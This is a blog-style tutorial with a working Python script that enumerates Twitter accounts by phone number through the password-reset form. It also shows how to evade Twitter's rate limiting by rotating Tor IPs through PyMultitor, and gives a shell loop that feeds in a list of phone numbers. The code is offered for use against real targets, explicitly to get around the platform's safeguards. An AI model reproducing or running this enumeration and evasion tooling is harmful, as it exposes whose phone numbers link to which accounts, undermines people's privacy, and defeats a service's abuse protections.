Word on the street is that you can just curl /account/begin_password_reset with account_identifier and you would get back if there was an account, kind of true, but Twitter implements some tokens for authentic requests and also blocks if more than 7 or more of the same requests come from same IP. So, in true hacker spirit, let’s get around these ‘safeguards’ and enumerate some numbers!

The Plan…

  • Script the browser form filling
  • Send to Twitter and filter out the noise, only show if we have an account
  • If we detect Twitter blocked us, lets use a new Tor IP

Getting Started

Time to install all the bits we need…

pip install mechanize
pip install bs4
pip install lxml

The Request

This part is simple, we can use mechanise which is nice for browser automation to send the right request. What’s nice about this is that mechanize will get all the tokens needed just as a normal user would, so no extra work here.

import sys
import re
from mechanize import Browser
from bs4 import BeautifulSoup
#new browser instance
br = Browser()
#open session in browser
br.open("https://twitter.com/account/begin_password_reset")
#select the first form seen in HTML response
br.select_form(nr=0)
#fill out the correct field value with the first argument to our script, the phone numbers
br.form["account_identifier"] = sys.argv[1]
#submits the form
response = br.submit()
#parse the response with lxml and BeautifulSoup
soup = BeautifulSoup(response.read(), "lxml")
#print out the text value found in 'PageHeader' section (result)
for element in soup.find_all(class_='PageHeader'):
print(element.text)
It works! Nice.

But after ~7 few tries we get this…

We will try again, don’t worry about that.

But we are impatient, and time is pwnage so let’s try and solve this issue with PyMultitor, a Python Multi Threaded Tor Proxy…realgam3/pymultitor
PyMultitor – Python Multi Threaded Tor Proxy. Contribute to realgam3/pymultitor development by creating an account on…github.com

We simply add a line to use a proxy, you can also see the commented command to run pymultitor, it looks for the error string and if detected gets a new IP from Tor network.

twitter-enum.py

import sys
import re
from mechanize import Browser
from bs4 import BeautifulSoup
br = Browser()
#https://github.com/realgam3/pymultitor
#pymultitor --on-string "Please try again later."
br.set_proxies({"http": "127.0.0.1:8080"})

br.open("https://twitter.com/account/begin_password_reset")
br.select_form(nr=0)
br.form["account_identifier"] = sys.argv[1]
response = br.submit() # submit current form
soup = BeautifulSoup(response.read(), "lxml")
for element in soup.find_all(class_='PageHeader'):
print(element.text)

When it’s all set up, just add the phone numbers to a text file and run this command…

for num in $(cat numlist.txt); do python twitter-enum.py $num; done
  • NOTE: A few Tor related bugs to iron out, but when I do I will update this post and get this on github. Without IP spoofing script works great for targeted OSINT on < 6 targets.